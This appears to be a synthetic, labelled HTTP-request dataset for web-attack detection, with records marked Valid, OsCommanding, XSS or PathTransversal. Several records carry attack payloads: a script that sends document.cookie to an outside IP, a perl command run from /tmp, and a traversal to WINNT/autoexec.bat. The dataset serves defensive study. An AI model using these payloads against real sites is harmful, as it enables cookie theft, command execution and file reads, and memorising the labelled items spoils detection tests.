If-Unmodified-Since: Mon, 20 Sep 04 05:07:36 GMT
If-Match: *
If-None-Match: "cix7pR7M9vofj2ncK"
If-Range: Mon, 08 Jun 09 14:20:53 CET
Max-Forwards: 7601
MIME-Version: 9.5
Pragma: edulgee='r8'
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: NTLM czI4d3NvdG5hM2hsYW90Mm9hZWgyaFNhYXJJSnc0SVBobXJi
Range: 32-3322,6622-
Referer: http://www.6Qsua.ch/x4hs/qreu/6ohnet.htm
TE: deflate,chunked
Trailer: From
User-Agent: Mozilla/4.4 (Windows; U; WinNT 8.7; aO-kn; rv:2.4.3) Gecko/37881003
UA-CPU: MIPS
UA-Disp: 4833,791,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 175x9558
Via: KLtRe/9.5 133.243.231.158:31, oaele/7.0 212.232.178.164
Transfer-Encoding: gzip
Upgrade: szO45Q/7.7, hf6/5.3
Warning: 629 www.ecbma.htm "smrFi67hp6Oamp" 
X-Forwarded-For: 186.115.86.145
X-Serial-Number: 64170789223686
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15240
Start - Id: 30922
class: Valid
GET /jseRtnruyceta/9i.u/tsfrw9masiebcnhg1nol/fRZy@XE.msf?cilcafenir5eonh=ekf+&aEaeTt0nsey=whereshee&24VBystdiniframeformL=no&4Std=t.bcsCIGSNSb&NchildZPPsAShavingHw=lcAw&1nnn=ayht%2F&rjp=858095&O7cVdotisnimc=r8a0Zk&mcitvulzHisTz1k=36245456&5rtsngnleml=22071725&43vhSJI=0nrahhosee&bAdyfrob5n=rjl&dtodn=jEao&NaR=ahr HTTP/1.0
Host: www.n4vhoiau.com
Connection: 8dhej6
Accept: audio/*, text/xml, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.8, gzip, identity;q=0.9, gzip
Accept-Language: tb-eetluZhg, aldi-i6eehi;q=0.5
Cache-Control: no-transform
Client-ip: 65.164.240.28
Cookie: u7hihtea=afoisEie
Cookie2: $Version="22"
Date: Wed, 29 Mar 06 12:55:39 CET
ETag: W/"mTV1.pOoNy5W2tY3"
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Sun, 20 Feb 05 16:33:16 CET
If-Unmodified-Since: Sat, 24 Dec 05 11:00:48 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Feb 07 11:52:29 CET
Max-Forwards: 29
MIME-Version: 5.0
Pragma: a0e3Isk='g'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 7-19547,727449-
Referer: http://ieae.fr/rsdeuau/1euo.php
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: 2ekau (i2Nn6xiIG2)
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: 1.8 www.Eforetso.js:7
Transfer-Encoding: identity
Upgrade: eily/4.9, eee2ss/1.6
Warning: 798 236.69.69.40 "am02o7a62ee6npoE" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30922
Start - Id: 43474
class: OsCommanding
GET /setoi/lFb/8dbe7irefpa/ED_Etk/g@eUwzPB3mtB/iX/tgr3yd7dEctlatg/3Yp-CkMehDfgGt8.exe?pTXssQEVv=ad&gehAbpr=fMhanitFthane8aatt&rrmdh=Pinclude&lhlsh9Yre=ai%5Dn&vems=53&lbja6Cenh6t=%2Fperl+%2Ftmp%2Ficdeal.pl+-p3055&mbsa=Aaoedts&besor=ao HTTP/1.1
Host: www.5e6astRssL.be:7
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1255;q=0.0, utf-7, windows-1255;q=0.4, x-mac-ce, koi8;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 5.223.71.17
Cookie: _xS74F=28488;re6dyinrw=byo
Cookie2: $Version="2"
Date: Sat, 21 Feb 09 10:01:08 UTC
ETag: W/"Gc17qNc-QoIwJfgPlGp"
Expect: Nlrhate=Eej0hh;etio=etesUr0
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sat, 26 May 07 03:20:45 GMT
If-Unmodified-Since: Fri, 14 Jan 05 12:18:01 UTC
If-Match: *
If-None-Match: "@vpav.5.eGQq70-hJS"
If-Range: Tue, 02 Nov 04 09:59:58 UTC
Max-Forwards: 7803
MIME-Version: 9.2
Pragma: g8rIdnms=TaddltT
Proxy-Authorization: Digest username="ncuenm"
Authorization: NTLM dGtpZEdhaGFldHkxbmU4bnRodGN3c295ZWdkaGFlNWhzZXRzc3NyZ2F2MHZhZXR6
Referer: http://eoddte.fr/tbgte/nyrnsi.jsp
TE: trailers
Trailer: Range
User-Agent: eioryrhs (ayZXkD-o0; pwwbtwO; aA_rhv9hD7; r1quWKcK)
UA-CPU: Sparc
UA-Disp: 663,6446,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 333x8954
Via: FTP/8.7 www.7yerro.gif, FTP/4.5 www.9tsb.tiff
Transfer-Encoding: deflate
Upgrade: lrtrnn/3.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
----: -----------------------------

null

End - Id: 43474
Start - Id: 18988
class: Valid
GET /DfTbKCmmTYaccess_logsock_streaml.js?eartfleoenhicfe=i5ewoelutr HTTP/1.0
Host: 84.172.200.172
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.0, compress, deflate, compress;q=0.5, deflate
Accept-Language: *;q=0.3
Cache-Control: max-age=08035
Client-ip: 103.87.128.39
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="10"
Date: Sat, 17 Oct 09 18:45:11 UTC
ETag: "tl3.Va1CRNawcF.FuL"
Expect: tsIdmot=s684y
From: l14gyjst@isddra.be
If-Modified-Since: Sun, 21 Mar 10 17:37:51 CET
If-Unmodified-Since: Wed, 24 Feb 10 24:29:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 5xRae onteCdsi=onReodh
Authorization: Digest username="lRiei"
Range: 2800-0168
Referer: /IlteinD/5qma/stszae/ameai/6feeas.php4
TE: deflate,trailers,deflate;q=0.5
Trailer: Host
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 2.4; kn-ty; rv:0.1.2) Gecko/67780024
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: HTTP/2.0 www.8atr.gif
Transfer-Encoding: identity
Upgrade: enfzlm/9.3, RMow/0.2, Fmr1/3.8, tsi/2.4, pil2/2.5
Warning: 231 www.oebeetlc.jpeg "ttllcvtieaktaidHen" 
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18988
Start - Id: 47852
class: XSS
GET /r4tdnF5H/yIx1qeINb/wilq@wVyDl_aPYEmne/owwLjoT/PaTa0Eadsa8reepyam/djAfE7e8_ue1pZBGy14/ewunie5w/eO/pDPE44gO/rmena/lLZ/owtii6amsOneponuU.gif?NXCE=9706657&jese7txqeSi=r%40hyn&irtizwu=%3Aartopenmaildadfxterm&Hietasaohtme=765&teeuo=autoexecR&td=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F178.79.67.54%2Fla.swf%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&Axicowm=e9HPoAr HTTP/1.1
Host: 156.227.9.149
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=89902
Client-ip: 90.39.41.117
Cookie: eathw2=2endnfha5baUaao;6d=ajol;vyUlw=711982;eostdsaot0adeg=ilolwXy-f;xterm4-5=  a esIea0efu
Cookie2: $Version="459"
Date: Sat, 09 Jul 05 12:28:20 GMT
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Wed, 01 Jun 05 22:15:51 UTC
If-Unmodified-Since: Sat, 20 Mar 10 04:40:22 GMT
If-Match: "bpC.jAKUt2HkyzhoKik"
If-None-Match: "LaACyNackHspn2N5Yw"
If-Range: *
Max-Forwards: 3913
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest realm
Range: 595606-7,222673-07
Referer: http://www.ecdNnu.org/rEeOtnHc/feO2ogm/2djoslt/4Imde.php
TE: deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: 48aw (fBxWgV; iSSevOJTK; e9Le0q; tGUH7T3W-5; wjNkSD0XFL)
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 7.9 www.tesnn.tiff:38
Transfer-Encoding: deflate
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47852
Start - Id: 45390
class: PathTransversal
PUT /aO6/lY76.4ryyp42POD6D0Bb/qpw@echo8ix/a8uanuliio4.png? HTTP/1.1
Content-Length: 222
Content-Language: st9dtiae,tglOM,siAiwo
Content-Encoding: identity
Content-Location: http://inyiTi.gov/ytsejo/sTti9tal.jpg
Content-MD5: ZW1sRVRlamd0Y2xpeHV4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 May 06 23:05:40 GMT
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: 106.247.104.63:80
Connection: igCea
Accept: text/html;q=0.4, text/html;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.5
Cache-Control: l='eeazoht'
Client-ip: 2.231.241.65
Cookie: 4elkooEnbhlhrA=5849591
Cookie2: $Version="7"
Date: Sat, 14 Aug 04 02:51:02 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: dr4hcedC@tene.com
If-Modified-Since: Mon, 23 May 05 19:11:08 CET
If-Unmodified-Since: Thu, 01 Mar 07 07:46:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3509
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: w5rt tanRog=ltsbt
Range: 49-
Referer: http://reDsnoA.it/eaih/pdwetdv1.tar
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: aurI/1.1.1.8
UA-CPU: MIPS
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: 7.6 62.255.214.214
Transfer-Encoding: deflate
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 928 www.yictte4.js "eobt1krstsZ2erAppmt" 
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

FS2_KfW5Mnodeimg=2feuftw8clRt&gBdivSLXGIFuI=9182414977&q_x8lbv5-6window.open=5099&@obprocessing-instructiont4mphpVP=zlo3Oe&f88auh=../../../WINNT/autoexec.bat&ellnr= &yi=9521152059&asrr3yAw=s1n&oeoen=ii&C-YjZC1=3929

End - Id: 45390
Start - Id: 30731
class: Valid
GET /vwUXzkQlscLcHZO.e91.cgi?OrgcOh8haa=89558&loubrlrhgaxlH=98&Eh=nEt&nsun=ieCniocsvchh&hdnt8=899 HTTP/1.1
Host: www.UlE5Rbomm.be
Connection: close
Accept: application/x-tar;q=0.9, image/jpeg;q=0.4, image/*
Accept-Charset: iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 45.133.46.216
Cookie: eerelpdlbnu6R=hxYv-rt@sN;lm=9387841
Cookie2: $Version="545"
Date: Tue, 02 Sep 08 04:48:48 UTC
ETag: "BcxivruTmgxjLi._A"
Expect: eroec=eauife
From: dubt@tmrdi.net
If-Modified-Since: Thu, 20 Dec 07 07:22:30 UTC
If-Unmodified-Since: Fri, 01 Aug 08 02:05:08 CET
If-Match: "nUATuU0Bzr396UkxQHri"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Digest username="tkaelef"
Range: 1-,-425,74618-
Referer: http://m1nl.org/tttl/rdnpyn/Swlnnne/86Noobr.jsp
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Language
User-Agent: fX9P71uALt http://www.gtRhc.it
UA-CPU: x86
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2445x5903
Via: Ocpt/9.4 231.191.254.140:7, HTTP/6.1 121.70.132.35:22097, 5.8 www.omha.shtml
Transfer-Encoding: identity
Upgrade: uom4/0.1, suMtl/8.8
Warning: 309 www.mtrueg.jpeg:8 "enaoExpt2ech" "Sun, 23 Oct 05 23:02:27 CET"
X-Forwarded-For: 158.68.127.255
X-Serial-Number: 248623
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30731
Start - Id: 22886
class: Valid
GET /t2glEtpy2kb/tY1nNhQFTyBh/pjEoeo5wiooRis3UAoz/t4xa/sgDk0Fs4-LO/lbsbwigleCr12sq/hKRUA8CB_ILR.cgi? HTTP/1.1
Host: 8.200.29.241:80
Connection: keep-alive
Accept: image/*;q=0.8, image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b-eeseet, ab-Aa;q=0.1
Cache-Control: no-store
Client-ip: 5.243.112.159
Cookie: uhoahmgSDeuyq=9rsowiiu;weDy06adhtjhi= eser;ssdfs2kEmsetns=cyehstyle;lsiexeccsYeT=cgJYHXynQP.b
Cookie2: $Version="8"
Date: Fri, 30 Apr 04 15:33:19 GMT
ETag: W/"ME6FG0_9uGnLRWBoQDlI"
Expect: 100-continue
From: hsdetaw@dtawa8.gov
If-Modified-Since: Thu, 27 Jul 06 09:21:30 UTC
If-Unmodified-Since: Mon, 09 Jan 06 02:47:21 GMT
If-Match: "V4h95rkLbI2AKF@"
If-None-Match: *
If-Range: Fri, 18 Jul 08 02:31:52 GMT
Max-Forwards: 0
MIME-Version: 2.2
Pragma: in=asa
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZE5yckIxVHRvYWVlcmFzb2lJb3NyZHNldGZ3ZWRzYVJ3bFlmOW5pb2xscnQ=
Range: 37032-5753,-977
Referer: http://www.iaUoiph.gov/atztnI/maeTdj/nioeseoa.jsp
TE: chunked,chunked;q=0.2,chunked;q=0.1
Trailer: TE
User-Agent: Mozilla/7.7 (compatible; Konqueror/4.1; Win98; eeneelu; hoZarAbet; eoh8e)
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 4.6 223.87.84.213
Transfer-Encoding: deflate
Upgrade: rhued/7.4
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22886
Start - Id: 7425
class: Valid
PUT /fmtwfiglarruh4baL9a/QUnjHU90dautoexecH/ady/nZ_NljWiZ/_pYboot.ini6_8P@binrm/lu/wi/hLyCV/0fuanfpIsimdlHznag/saA7tohneum9rAb.htm? HTTP/1.0
Content-Length: 13
Content-Language: nto,coeb,1nmawtfr
Content-Encoding: compress
Content-Location: /iro5az.swf
Content-MD5: Z3JpOWJlc1RvME90c2RvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 04:14:55 GMT
Last-Modified: Sat, 18 Apr 09 02:29:55 GMT
Host: www.b3sr.it
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: 
Accept-Language: sEed8rw-hoetVg7;q=0.2
Cache-Control: max-stale
Client-ip: 160.48.187.134
Cookie: cntnzioy=ewxhVxGGllV;dtpLeeke=qheitdsd4;naisii=|eaeoe?gou;s3=27064;mnvkdqe1e=E y eosdrophl
Cookie2: $Version="5"
Date: Fri, 08 Dec 06 12:14:56 GMT
ETag: "JpO5KtlzF_TVk9zONL"
Expect: fiesu0=SnTsl4ri;caydivv=rtIIz
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 28 May 05 04:06:23 UTC
If-Unmodified-Since: Thu, 07 Dec 06 20:15:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 19 Jun 05 04:47:31 CET
Max-Forwards: 977
MIME-Version: 3.8
Pragma: Sdoxa=tNren
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Digest nc=965bc9eD
Range: 1-587,1-,-06
Referer: /etno/0sot/uaeEn.wmn
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: ynhuena4s (cvqtr90; wHUc0.; 99w8o-Iv; rRWsUbI)
UA-CPU: MIPS
UA-Disp: 0192,953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: 1.7 3.203.29.142
Transfer-Encoding: gzip
Upgrade: tUs1la/5.6
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

igoI=57649106

End - Id: 7425
Start - Id: 23152
class: Valid
GET /47/asZKs53lMcMsWD/iinpss/bnweh7neEnies/tmpUSodYli/csho/eTS3Y2XoPeKtytAN-7r/oilLw5sgennlni.tiff?eSr=T7eoau6tv885a&qtfrcpLYTB=beoapthda&grsreridect=zLnis8rGosnnht&ertdji1=tfugimorekolo&op49i=u_nRK1g4.ge&Ihgn=46032763&39ZD-gQoDJH=5775976&n0os7xInanpszn6=153998&Yhtaccesnetcatd=OrtN%5Cia%25io&srx1hvk=rt&gei9s=boetA&ceiUmxRmoofnc=dne&ts=aen&o.c3C=betweene HTTP/1.0
Host: 129.230.126.113
Connection: keep-alive
Accept: application/*;q=0.1, application/*;q=0.4, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 147.170.210.217
Cookie: tsIen3kL=ss-;ctahe=l]
Cookie2: $Version="573"
Date: Wed, 23 Jun 04 10:47:26 UTC
ETag: W/"DoQ3O1.-wYoAiKs"
Expect: srvh=dslq;Lte6owo
From: aadN@latousamhh.uk
If-Modified-Since: Thu, 17 Sep 09 21:52:01 GMT
If-Unmodified-Since: Fri, 24 Sep 04 07:51:39 GMT
If-Match: *
If-None-Match: "VDkwovtJgAGj3V9p"
If-Range: *
Max-Forwards: 91
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: vmNes wviEoe4=octBtseu
Range: 260-
Referer: http://gh6a.it/sneelEht.htm
TE: deflate
Trailer: Proxy-Authorization
User-Agent: aeRe7a4tbhuiwoE
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 293x103
Via: 8.6 233.112.146.116:0667, FTP/4.5 www.ruy3C.htm
Transfer-Encoding: identity
Upgrade: ohoat/3.5, rmvl/7.0
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 179.20.58.194
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23152
Start - Id: 100
class: Valid
GET /hsc6t.jpg?4Esg=vAN6q&@NcaQstelnetselect=7541012&jnoi=mf&XnuWBJH2gR=87&biiosaokaAh97jb=018&neamsw3mrow=ni6uae8 HTTP/1.0
Host: www.eershJ.fr:80
Connection: keep-alive
Accept: video/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 113.43.232.139
Cookie: ueloodle20=7ecwCsty0nNngnS
Cookie2: $Version="917"
Date: Wed, 05 Mar 08 15:34:29 CET
ETag: "1NV4XqgiJUYiToGTJsuy"
Expect: d4es
From: EoHehctl@aabyts.be
If-Modified-Since: Fri, 23 May 08 18:09:01 GMT
If-Unmodified-Since: Tue, 26 Apr 05 17:43:58 GMT
If-Match: *
If-None-Match: "99iWPwXO9qlhbzV"
If-Range: "-_vc0A3BOmqrpyaMi"
Max-Forwards: 855
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: mEaE 9tettee=whEste0t
Authorization: NTLM THBoZTlpZWx3MGUwd3JhaG4wTGVweTRkb2N5ZWFhZ2NheHp1
Range: 41396-563,553741-
Referer: /yricBedt/drReuse0/den6.conf
TE: chunked
Trailer: Date
User-Agent: ntnesOm
UA-CPU: MIPS
UA-Disp: 156,678,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5749x1102
Via: HTTP/6.0 www.l7trvsd.gif:6312, omgf/5.7 76.165.237.234:19
Transfer-Encoding: gzip
Upgrade: 6fi/2.6, zosvm/9.8
Warning: 072 208.33.148.233:391 "ceisHREdehQstgAa" "Wed, 04 Jul 07 07:49:02 GMT"
X-Forwarded-For: 137.18.70.212
X-Serial-Number: 9265848475
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 100
Start - Id: 29044
class: Valid
GET /nfERdYV-/eEN1.htm?tkionee=dHkbj5a&lcCcmd5Ug=2108616 HTTP/1.1
Host: www.g0dkDhnRco.de:14890
Connection: keep-alive
Accept: application/*, image/*, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Arubl-nwhot, d-nohdi8lc;q=0.7, ta7ykc-z;q=0.4, orrnogv-ngrltc, oasi-ronwm
Cache-Control: min-fresh=5782
Client-ip: 195.6.87.147
Cookie: Dehbiomh=2648041;mhytqndiT=o
Cookie2: $Version="403"
Date: Wed, 31 May 06 05:46:40 CET
ETag: W/"8f.b@PKNWlrNy1@y3@"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Thu, 01 Feb 07 12:04:55 CET
If-Match: "LDo3.dH@igSULtQgM"
If-None-Match: "GDGhYXeCYpTLjIVY"
If-Range: Thu, 29 Jun 06 06:46:15 GMT
Max-Forwards: 998
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM aWVBMWpuc1dlem5xYW9ld1Vscmx0Mm9vOWVUc21hSTBhcnQ=
Authorization: Basic dllkbjppN3l0cg==
Range: 3-,5985-7558,753-
Referer: /ivse/stEnaate/s6Tgre/dwlo/slet.js
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.8 (compatible; Konqueror/2.1; Unix; tqne; eusnrrphrh)
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: FTP/9.9 238.138.203.124, dttots/8.7 www.ofarred.gif
Transfer-Encoding: gzip
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 861 14.0.150.19 "eaQ3e" "Mon, 03 May 04 08:13:54 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29044
Start - Id: 47391
class: XSS
GET /sd2nnEpm8rdp/xJT-tTc_homeI37.php4?d7tesuijrotfiaa=n9Ua4RIGw9-&DjThUd=9&5z=l4L2b&Yocon5zaqoste=nrsI&rtcatusqc=r86ZR&WRe7eto=73851357&emEaht0s=7&otwtaf5r6tCne7=37802&polg0poVneEran=scyi%3BmetabiniHho&rloayc=ln&Orcur=%3Cimg++++src++++%3D+%22+++++mocha%3A%5Balert%28%27Dtqciismi%27%29%3B%5D++++%22+++%3E&0eqo4ia=223 HTTP/1.1
Host: 124.221.57.230
Connection: close
Accept: video/*;q=0.4, video/*;q=0.7, application/*
Accept-Charset: shift_jis, utf-7
Accept-Encoding: gzip, identity;q=0.2
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 19.40.104.14
Cookie: S5zVAJchildOSp=fiatm ;toosowg=dHootqil;ie=9091
Cookie2: $Version="92"
Date: Fri, 15 May 09 22:41:05 CET
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: ra6tapm@ejbc5awp.com
If-Modified-Since: Fri, 12 Nov 04 03:42:00 GMT
If-Unmodified-Since: Sat, 01 Oct 05 06:31:01 UTC
If-Match: "4Y8nSEt-_TiAm7GBoO6"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 8508
MIME-Version: 1.0
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 35419-,75138-2674,165640-
Referer: /srtbw.css
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Expect
User-Agent: wh7eyolIr6/0.1.5
UA-CPU: MIPS
UA-Disp: 7745,5252,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: FTP/3.6 www.eavf.css, FTP/5.3 www.yMsndc.shtml
Transfer-Encoding: iwizw
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47391
Start - Id: 14423
class: Valid
GET /higfhioadowlaNqtqt/eN38GYiS5cmN/1jbFwYj/oni.yw_0HWz/tdoo/ai7/1EoUVN@.cgi?iHbdDx0Efefhuah=tOAin&XLkS4hP4Te=i-%3FahNstftocmdt&Oqih=binhexecautoexecaT99i%3Baechounion&ntterTb=549&pilAfR=f%5Cocopyhkercpeg&a7tseo=3&ogtd0aeuhrbcir=243&erc=sGbag&hweiioDs5em=esoANue9o%24oea&rlhexeeIegatt=fuiAiialr7&2rfrom.MermTphpotmp=7nchttpw&p1di9nttnc=sNuli&Oieraa=182&uieder8xrhrh=pa%3Ceewq6gitoua7&lIu0N=4033 HTTP/1.1
Host: www.tcan.gov
Connection: keep-alive
Accept: text/html;q=0.5, application/x-tar, text/xml
Accept-Charset: x-mac-korean;q=0.9, x-mac-greek, gb2312
Accept-Encoding: 
Accept-Language: iokcehth-qo;q=0.0, 5Ns0ohe-x
Cache-Control: no-cache
Client-ip: 44.87.22.36
Cookie: w5orst=oowuenrwfir
Cookie2: $Version="40"
Date: Tue, 02 Feb 10 02:39:16 GMT
ETag: W/"NhdsW36GfqY5xcSFr."
Expect: teaEoqv
From: eeruerum@ttseykhtas.gov
If-Modified-Since: Fri, 23 Nov 07 15:01:08 UTC
If-Unmodified-Since: Mon, 20 Apr 09 24:09:44 UTC
If-Match: *
If-None-Match: "IMSuC0kr7GMPr02b2pqZ"
If-Range: *
Max-Forwards: 0673
MIME-Version: 1.0
Pragma: mr9=e6
Proxy-Authorization: Letted rWnhgaAo=tiitsc
Authorization: NTLM NmVyZWZrcmJsb3RyaWVQaGkwWWlnaGVlRW1paG9zNGJveDNzY2ZNVGFB
Range: 4092-532,5-905308,631-2
Referer: http://2eotna.net/otefasmo/rgt2neep/icwntvl.exe
TE: deflate,chunked
Trailer: Proxy-Authorization
User-Agent: rvgyg_4dyv http://www.qanrs.be
UA-CPU: MIPS
UA-Disp: 769,941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: FTP/7.8 www.wtts.jpeg, 7.6 www.L5Rt5ras.jpg, 5.1 www.rssrum.css
Transfer-Encoding: eetrms
Upgrade: rean/3.6, zmcrDo/5.0, aoielb/7.5, Hearne/3.1
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14423
Start - Id: 24282
class: Valid
GET /6louseoiNSefo5se8ioN/HklntSt/iante0eeiyniqe90s.jpg?LsTiD=mmnaicd89&r2osotchl=t2ji&26Q1mCqhw=6113&a1=el&aqsitc=ilqxGU&nn3mNntcrhontee=shutdownien%7C HTTP/1.1
Host: www.iseloPewE2.be
Connection: sosZdlan
Accept: application/x-tar, application/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 105.86.77.115
Cookie: yfpe9bymh=o8st O~$E;eeVrmrHu=p5y-opo
Cookie2: $Version="255"
Date: Fri, 25 Jun 04 02:56:19 UTC
